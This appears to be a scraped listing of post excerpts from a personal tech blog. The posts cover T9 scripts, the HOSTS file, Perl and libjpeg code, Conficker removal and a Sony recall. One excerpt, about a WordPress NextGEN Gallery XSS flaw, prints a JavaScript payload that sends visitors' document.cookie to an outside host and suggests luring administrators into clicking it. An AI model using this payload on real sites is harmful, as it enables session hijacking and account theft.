http://digitalpbk.blogspot.com/2008/07/trie-data-structure-c-t9.html
T9.shumask 077NUMN=/tmp/numn.$$trap "exit 1" HUP INT PIPE QUIT TERMtrap "rm -f $DICTN $NUMN" EXITcat t9.dic | tr a-z 22233344455566677778889999 > $NUMNif [ $# -eq 0 ] ; then echo "Usage : t9.sh " exit 1;else
paste -d: $NUMN t9.dic | grep "^$1" | cut -d":" -f2 | sortfi ...
Published 3 years, 6 months ago
http://digitalpbk.blogspot.com/2006/11/about-hosts-file.html
About "HOSTS" File
Warning: Backup the file before playing with it!What does this file do?The HOSTS file found on Windows (and
linux too) is like a local DNS (domain name server). When you type a url on the browsers address bar, the domain name is converted to the IP of the server by a DNS lookup by the browser. Now here is the catch ... Windows first looks at the HOSTS file before doing any DNS lookup. So we can block certain sites by editing the HOSTS file. Where is it ? I dont see ...
Published 5 years, 2 months ago
http://digitalpbk.com/laptop-tv/how-to-connect-laptop-tv
laptop to display your screen on TV
Windows options to connect laptop and TV
Open display properties on windows, and you should see a screen as shown below:
If you dont see your connected monitors / TV on your laptop screen as shown above,
click on the detect button as highlighted.
Now the television / monitor should be detected.
There are 3 modes of displaying your laptop monitor on a TV. It is called Projection options since commonly laptops are connected to projectors. You can choose ...
Published 4 months, 1 week ago
http://digitalpbk.blogspot.com/2008/06/perl-download-manager.html
Perl Download Manager
IntroThis is my PERL downloader program, with resume.Only works if SERVER has Parts
enabled.Well pretty much thats it #!/usr/bin/perluse strict;use threads;use threads::shared;use HTTP::Request;use HTTP::Response;use Math::Round qw(nearest);use LWP;exit unless(defined $ARGV[0] && -e $ARGV[0]);open HND,$ARGV[0];NEXT:while(my $url = ){ my $file = substr($url,rindex($url,"/")+1); $file =~ s/%20/_/g; chomp $url; exit if($url eq "" || $file eq ...
Published 3 years, 7 months ago
http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html
code can be put for stealing the cookie:(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to
click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 6 months ago
http://digitalpbk.blogspot.com/2009/04/jwgkvsqvmx-conficker-virus-manual.html
Conficker disables the Background Intelligent Transfer Service (BITS) and Windows Automatic Updates. So If you find these services disabled, be alert. (To checkout what services are running and their statuses Run > services.msc.Follow these steps to detect and remove Conficker virus:Run regedit.exe registry editorGoto HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\SvcHost\netsvcsDouble
click the key to see if there is a random value at its end.Note the "zbtthjd" at the end ...
Published 2 years, 10 months ago
http://digitalpbk.blogspot.com/2009/01/code-libjpeg-converting-jpeg-to-bmp.html
C Code to convert JPEG to BMP in
LINUX using libjpeg
IntroThe following code converts JPEG file into BMP file. The code requires the libjpeg library. The following code is a good example of how to use the libjpeg library. (it compiles). Code converts colour jpeg to 24bit BITMAP.Code : jpeg2bmp.c#include #include #include #include /* we will be using this uninitialized pointer later to store raw, uncompressd image */unsigned char *raw_image = NULL;/* dimensions of the image we want to write ...
Published 3 years ago
http://digitalpbk.com/sony-vaio/sony-vaio-f-and-cw-series-recalled-due-heat-problem-vpccw26fg
Sony Vaio F and CW series recalled due to heat problem VPCCW26FG
Sony is to recall over half a million laptops of its CW and F series due to a potential overheat problem. This problem is due to a bug in the firmware of the Sony Vaio CW series and Sony Vaio F series laptops. Sony has released a new firmware update to fix this issue that results in overheating and deformation of the laptop casing.
Click Sony Vaio Firware update download to download and install the firmware update that solves ...
Published 1 year, 7 months ago